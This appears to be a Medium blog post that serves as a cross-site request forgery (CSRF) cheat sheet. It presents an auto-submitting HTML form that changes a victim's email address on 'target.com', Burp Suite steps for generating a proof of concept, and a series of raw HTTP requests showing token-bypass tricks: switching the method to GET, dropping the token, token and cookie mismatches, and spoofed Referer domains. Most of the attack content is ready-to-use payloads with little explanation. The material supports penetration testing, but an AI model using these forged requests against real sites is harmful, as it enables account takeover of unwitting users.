Cross-Site Request Forgery — CSRF

POST /email/change HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=3f3b074907edbba29fb6d6c643644a2e

email=abc@123.com
<html>
<body>
<form action=”https://target.com/email/change" method=”POST”>
<input type=”hidden” name=”email” value=”abc@123.com” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
  1. Intercept vulnerable request
  2. Right click to open menu
  3. Select Engagement tools > generate csrf poc.
  1. Validation on request method : Some application validates the token with POST method along with action but not in GET method.
#Normal Request with POST methodPOST /email/change HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Cookie: session=3f3b074907edbba29fb6d6c643644a2e

csrf=gh1lLkp9H0paQLmytacNbytBNKlw&email=abc@123.com
#Modified Request from Post to GETGET /email/change?email=abc@123.com HTTP/1.1
Host: target.com
Cookie: session=3f3b074907edbba29fb6d6c643644a2e
# Request without CSRF token.POST /email/change HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Cookie: session=3f3b074907edbba29fb6d6c643644a2e

email=abc@123.com
POST /email/change HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Cookie: session=3f3b074907edbba29fb6d6c643644a2e;csrf=kLwJo4MsnMsbH8nks7KhszAfw2xVxe2f

csrf=Jka2NJ3kmnO3KLk7kHs04Kls1aSemc5L&email=abc@123.com
POST /email/change HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Cookie: session=3f3b074907edbba29fb6d6c643644a2e;csrf=kLwJo4MsnMsbH8nks7KhszAfw2xVxe2f

csrf=kLwJo4MsnMsbH8nks7KhszAfw2xVxe2f&email=abc@123.com
POST /email/change HTTP/1.1
Host: target.com
Referer: https://target.com/email
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=3f3b074907edbba29fb6d6c643644a2e

email=abc@123.com
referer: http://target.com.my-website.com/abc
referer: http://my-website.com/abc?target.com

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Pi KYC -2022 Get Ready for an Amazing Crypto Revolution Pi Kyc!

ASSIGNMENT 2 — LAW AND REGULATION, SIS COURSE

WHY, WHAT, AND HOW: A COMPLETE GUIDE TO DEVSECOPS

We happy Announce Stake $WSPP Get $POLICE

[Write-up] LetsDefend — Suspicious Mshta Behavior

WEB 3.0

Best antivirus software for 2021

Improper logging leads to vulnerabilities

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Hardeep Singh Sandhu

Hardeep Singh Sandhu

More from Medium

How to manually exploit SQL Injection?

My Pentest Log -9- (Open Redirect Vulnerability in ASP)

Intigriti XSS Challenge 0222 — Write-Up